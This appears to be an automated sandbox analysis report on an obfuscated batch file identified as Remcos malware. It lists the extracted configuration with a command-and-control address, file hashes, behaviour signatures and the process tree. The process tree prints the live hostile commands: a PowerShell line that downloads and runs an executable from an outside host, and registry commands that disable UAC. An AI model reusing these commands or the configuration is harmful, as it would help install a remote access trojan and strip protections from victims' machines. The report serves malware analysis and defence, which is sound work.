Analysis
-
max time kernel
94s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 14:22
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document_obf.bat
Resource
win7-20241010-en
General
-
Target
New Text Document_obf.bat
-
Size
1KB
-
MD5
afe542deaafa2826040b1aafd7ce94bf
-
SHA1
1b34eea5ba992877fbba707f6b6320b6974b245c
-
SHA256
137771c08a3b7e830d500119028bcd379f07a1f9f59f3dd6661790c40f941524
-
SHA512
c6df2a12264e9f9ffea5e080beb9874a590a7286f43f901096b89952df534082094052ff7b79294928695af3cea1eb433a616e686e85d922e96fe649db483ff2
Malware Config
Extracted
remcos
RemoteHost
194.59.31.143:4444
-
audio_folder
xboxGameBar
-
audio_path
%SystemDrive%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
ploi.exe
-
copy_folder
koi
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%SystemDrive%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-ZU01ZO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 1400 powershell.exe -
pid Process 1400 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 3628 nostart.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3628 set thread context of 5008 3628 nostart.exe 95 PID 5008 set thread context of 848 5008 iexplore.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nostart.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 212 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings iexplore.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 4960 reg.exe 2268 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1400 powershell.exe 1400 powershell.exe 3628 nostart.exe 3628 nostart.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3628 nostart.exe 5008 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1400 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 232 wrote to memory of 212 232 cmd.exe 84 PID 232 wrote to memory of 212 232 cmd.exe 84 PID 232 wrote to memory of 1400 232 cmd.exe 85 PID 232 wrote to memory of 1400 232 cmd.exe 85 PID 232 wrote to memory of 3628 232 cmd.exe 91 PID 232 wrote to memory of 3628 232 cmd.exe 91 PID 232 wrote to memory of 3628 232 cmd.exe 91 PID 3628 wrote to memory of 4300 3628 nostart.exe 93 PID 3628 wrote to memory of 4300 3628 nostart.exe 93 PID 3628 wrote to memory of 4300 3628 nostart.exe 93 PID 3628 wrote to memory of 5008 3628 nostart.exe 95 PID 3628 wrote to memory of 5008 3628 nostart.exe 95 PID 3628 wrote to memory of 5008 3628 nostart.exe 95 PID 3628 wrote to memory of 5008 3628 nostart.exe 95 PID 5008 wrote to memory of 2008 5008 iexplore.exe 96 PID 5008 wrote to memory of 2008 5008 iexplore.exe 96 PID 5008 wrote to memory of 2008 5008 iexplore.exe 96 PID 4300 wrote to memory of 2268 4300 cmd.exe 97 PID 4300 wrote to memory of 2268 4300 cmd.exe 97 PID 4300 wrote to memory of 2268 4300 cmd.exe 97 PID 5008 wrote to memory of 848 5008 iexplore.exe 98 PID 5008 wrote to memory of 848 5008 iexplore.exe 98 PID 5008 wrote to memory of 848 5008 iexplore.exe 98 PID 5008 wrote to memory of 848 5008 iexplore.exe 98 PID 2008 wrote to memory of 4960 2008 cmd.exe 100 PID 2008 wrote to memory of 4960 2008 cmd.exe 100 PID 2008 wrote to memory of 4960 2008 cmd.exe 100 PID 5008 wrote to memory of 2320 5008 iexplore.exe 109 PID 5008 wrote to memory of 2320 5008 iexplore.exe 109 PID 5008 wrote to memory of 2320 5008 iexplore.exe 109
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New Text Document_obf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\system32\timeout.exetimeout /t 2 REM Wait for 2 seconds to simulate processing2⤵
- Delays execution with timeout.exe
PID:212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { Invoke-WebRequest -Uri 'https://209a4381-e3eb-466a-9efc-fca8d71e6314-00-2bl68nwmi4jw4.kirk.replit.dev/nostart.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\nostart.exe' } catch { Write-Host 'Failed to download file: $_'; exit 1 }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Users\Admin\AppData\Local\Temp\nostart.exe"C:\Users\Admin\AppData\Local\Temp\nostart.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2268
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4960
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe4⤵PID:848
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\gojzjmcrodwrbk.vbs"4⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
500B
MD5dcaafbad4690ac10db87cec1cb018d53
SHA1f334c85f79b604ae2ca40f43c74061588cfbf3ad
SHA256412f6741f468525abc7489e66960c4494b85023e6019b1b15ab81e1690acc093
SHA512fd892bf3f6140eb8df1053f97fa0ae829e322751dc1745bcfa7dab2a4f12f7bd486b0b1ed4cb939fc50b01e2c4df395759b71680c3c9f1ce9539725928ab684c
-
Filesize
481KB
MD53a57301d5b27cf1ef1f634af4950f593
SHA1fd21a65c2272ef3bb05521994022e56ab017b494
SHA2568df3bcdf64bbc3752bcdc19b64fc50aaff8333c78f470e52a96001c7a7529318
SHA512d0392099fcbb5c5e50732213d666b96b5e17c7c50ddfecad35b7930111d08c3d39d067bd9774fb7a430db68f8c84d51e863ee4b39f274329d62918610093b80c